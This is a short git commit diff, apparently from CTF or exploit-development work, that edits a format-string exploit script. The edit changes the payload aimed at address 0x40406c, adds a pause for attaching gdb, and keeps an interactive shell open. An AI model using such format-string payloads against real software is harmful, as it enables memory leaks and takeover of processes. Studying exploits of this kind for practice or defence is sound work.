dingdong
This commit is contained in:
@@ -23,7 +23,9 @@ bug_addr = 0x40406c
|
||||
|
||||
# Example interaction
|
||||
recv_until(b'What is your name?')
|
||||
payload = b"\x6c\x40\x40 %x %x %x %x %s"
|
||||
payload = b"\x40\x40\x6c" + b"%08$6x\n"
|
||||
print("enter if gdb attached")
|
||||
input()
|
||||
send_payload(payload)
|
||||
|
||||
interact() # Keep the shell open
|
||||
|
||||
Reference in New Issue
Block a user